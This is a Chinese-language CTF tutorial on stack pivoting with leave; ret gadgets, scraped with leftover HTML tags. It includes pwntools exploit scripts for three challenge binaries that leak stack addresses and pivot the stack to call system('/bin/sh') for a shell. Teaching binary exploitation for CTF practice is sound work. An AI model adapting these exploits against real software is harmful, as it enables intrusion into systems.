栈迁移技术详解与实践指南<\/h1>

0x01 栈迁移概述<\/h2>
栈迁移(Stack Pivoting)是一种通过修改栈指针(ESP\/RSP)将栈转移到其他内存区域的技术，主要用于解决栈溢出空间不足的问题。当溢出空间不足以容纳完整的攻击载荷(payload)时，通过栈迁移可以将栈转移到更大的内存区域(如.bss段、堆等)继续执行攻击代码。<\/p>

0x02 栈迁移的基本原理<\/h2>

使用条件<\/h3>
存在栈溢出漏洞<\/li>
存在可写入的内存区域作为新栈空间<\/li> <\/ol>
核心指令：leave; ret<\/h3>
leave<\/code>指令相当于以下两条指令的组合：<\/p>
mov<\/span> esp<\/span>, ebp<\/span>  ; 将ebp的值赋给esp
<\/span><\/span><\/span><\/span>pop<\/span> ebp<\/span>       ; 从栈顶弹出值到ebp
<\/span><\/span><\/span><\/code><\/pre>ret<\/code>指令相当于：<\/p>
pop<\/span> eip<\/span>       ; 从栈顶弹出值到eip(指令指针)
<\/span><\/span><\/span><\/code><\/pre>栈迁移流程<\/h3>

第一次leave; ret：将栈指针迁移到新位置<\/li>
第二次leave; ret：在新栈位置执行攻击代码<\/li>
<\/ol>
0x03 32位栈迁移实例分析<\/h2>
案例1：网鼎杯pwn2<\/h3>
程序分析<\/strong>：<\/p>

32位程序，仅开启NX保护<\/li>
需要先通过login验证才能进入vulnerable函数<\/li>
vuln函数中存在栈溢出，但溢出空间有限(仅8字节)<\/li>
<\/ul>
利用步骤<\/strong>：<\/p>

绕过login验证<\/li>
接收程序泄露的buf地址<\/li>
构造payload：

在新栈位置布置system调用<\/li>
填充至足够长度<\/li>
覆盖返回地址为leave; ret指令地址<\/li>
<\/ul>
<\/li>
<\/ol>
关键点<\/strong>：<\/p>

在system地址前填充4字节，防止ret指令破坏payload结构<\/li>
需要两次leave; ret完成迁移和执行<\/li>
<\/ul>
EXP分析<\/strong>：<\/p>
from<\/span> pwn import<\/span> *<\/span>
<\/span><\/span>context(arch=<\/span>'i386'<\/span>,os=<\/span>'linux'<\/span>,log_level=<\/span>'debug'<\/span>)
<\/span><\/span>
<\/span><\/span>elf =<\/span> ELF('.\/short'<\/span>)
<\/span><\/span>p =<\/span> process('.\/short'<\/span>)
<\/span><\/span>system =<\/span> 0x80484A0<\/span>
<\/span><\/span>binsh =<\/span> 0x804A038<\/span>
<\/span><\/span>leave =<\/span> 0x8048674<\/span>
<\/span><\/span>
<\/span><\/span># 绕过login<\/span>
<\/span><\/span>p.<\/span>sendlineafter('Enter your username: '<\/span>,'admin'<\/span>)
<\/span><\/span>p.<\/span>sendlineafter('Enter your password: '<\/span>,'admin123'<\/span>)
<\/span><\/span>
<\/span><\/span># 获取泄露的buf地址<\/span>
<\/span><\/span>p.<\/span>recvuntil('0x'<\/span>)
<\/span><\/span>buf =<\/span> int(p.<\/span>recv(8<\/span>),16<\/span>)
<\/span><\/span>
<\/span><\/span># 构造payload<\/span>
<\/span><\/span>payload =<\/span> b<\/span>'aaaa'<\/span> +<\/span> p32(system) +<\/span> p32(0<\/span>)+<\/span> p32(binsh)
<\/span><\/span>payload =<\/span> payload.<\/span>ljust(0x50<\/span>,b<\/span>'<\/span>\x00<\/span>'<\/span>) +<\/span> p32(buf) +<\/span> p32(leave)
<\/span><\/span>
<\/span><\/span>p.<\/span>recvuntil('plz input your msg:<\/span>\n<\/span>'<\/span>)
<\/span><\/span>p.<\/span>send(payload)
<\/span><\/span>p.<\/span>interactive()
<\/span><\/span><\/code><\/pre>案例2：ciscn_2019_es_2<\/h3>
程序特点<\/strong>：<\/p>

利用printf(%s)的特性泄露地址<\/li>
溢出空间有限(0x28字节输入，0x30字节缓冲区)<\/li>
<\/ul>
利用技巧<\/strong>：<\/p>

使用send而非sendline发送payload，避免自动添加\n<\/li>
通过填充+特定字符(b'b')定位泄露地址<\/li>
计算新栈位置(s = ebp - 0x38)<\/li>
<\/ol>
EXP关键部分<\/strong>：<\/p>
# 泄露ebp地址<\/span>
<\/span><\/span>payload1 =<\/span> b<\/span>'a'<\/span>*<\/span>0x27<\/span> +<\/span> b<\/span>'b'<\/span>
<\/span><\/span>p.<\/span>send(payload1)
<\/span><\/span>p.<\/span>recvuntil('b'<\/span>)
<\/span><\/span>s =<\/span> ebp =<\/span> u32(p.<\/span>recv(4<\/span>)) -<\/span> 0x38<\/span>
<\/span><\/span>
<\/span><\/span># 构造迁移payload<\/span>
<\/span><\/span>payload2 =<\/span> b<\/span>'aaaa'<\/span> +<\/span> p32(system_addr) +<\/span> b<\/span>'aaaa'<\/span> +<\/span> p32(s +<\/span> 16<\/span>) +<\/span> b<\/span>'\/bin\/sh'<\/span>
<\/span><\/span>payload2 =<\/span> payload2.<\/span>ljust(0x28<\/span>,b<\/span>'<\/span>\x00<\/span>'<\/span>) +<\/span> p32(s) +<\/span> p32(leave_addr)
<\/span><\/span><\/code><\/pre>0x04 64位栈迁移技术<\/h2>
与32位的区别<\/h3>

参数传递方式不同(通过寄存器而非栈)<\/li>
需要找到合适的ROP gadget(如pop rdi; ret)<\/li>
<\/ol>
案例：KEEP ON<\/h3>
特点<\/strong>：<\/p>

64位程序<\/li>
存在格式化字符串漏洞用于泄露地址<\/li>
需要构造ROP链<\/li>
<\/ul>
关键点<\/strong>：<\/p>

使用格式化字符串泄露rbp地址<\/li>
计算新栈位置(s = rbp_addr - 0x60 - 0x8)<\/li>
在64位下需要正确设置参数寄存器<\/li>
<\/ol>
EXP片段<\/strong>：<\/p>
# 泄露rbp地址<\/span>
<\/span><\/span>fmtpayload =<\/span> b<\/span>'%16$p'<\/span>
<\/span><\/span>p.<\/span>sendline(fmtpayload)
<\/span><\/span>p.<\/span>recvuntil('0x'<\/span>)
<\/span><\/span>rbp_addr =<\/span> int(p.<\/span>recv(12<\/span>),16<\/span>)
<\/span><\/span>
<\/span><\/span># 构造ROP链<\/span>
<\/span><\/span>s =<\/span> rbp_addr -<\/span> 0x60<\/span> -<\/span> 0x8<\/span>
<\/span><\/span>payload =<\/span> p64(rdi) +<\/span> p64(s +<\/span> 0x8<\/span> +<\/span> 0x18<\/span>) +<\/span> p64(system_addr) +<\/span> b<\/span>'\/bin\/sh<\/span>\x00<\/span>'<\/span>
<\/span><\/span>payload =<\/span> payload.<\/span>ljust(0x50<\/span>,b<\/span>'a'<\/span>) +<\/span> p64(s) +<\/span> p64(leave_addr)
<\/span><\/span><\/code><\/pre>0x05 栈迁移技术总结<\/h2>


核心思想<\/strong>：通过修改栈指针将执行环境转移到更大的内存区域<\/p>
<\/li>

关键指令<\/strong>：leave; ret组合<\/p>
<\/li>

必要步骤<\/strong>：<\/p>

泄露或计算新栈位置<\/li>
在新栈位置布置payload<\/li>
通过两次leave; ret完成迁移和执行<\/li>
<\/ul>
<\/li>

注意事项<\/strong>：<\/p>

32位和64位架构下的参数传递差异<\/li>
payload构造时的字节对齐问题<\/li>
确保新栈位置可写且足够大<\/li>
<\/ul>
<\/li>

练习建议<\/strong>：<\/p>

使用GDB调试观察栈迁移过程<\/li>
从简单案例开始，逐步增加难度<\/li>
结合其他漏洞(如格式化字符串)进行综合利用<\/li>
<\/ul>
<\/li>
<\/ol>
通过理解栈迁移的基本原理并实践上述案例，可以掌握这种在有限溢出空间下实现攻击的重要技术。<\/p>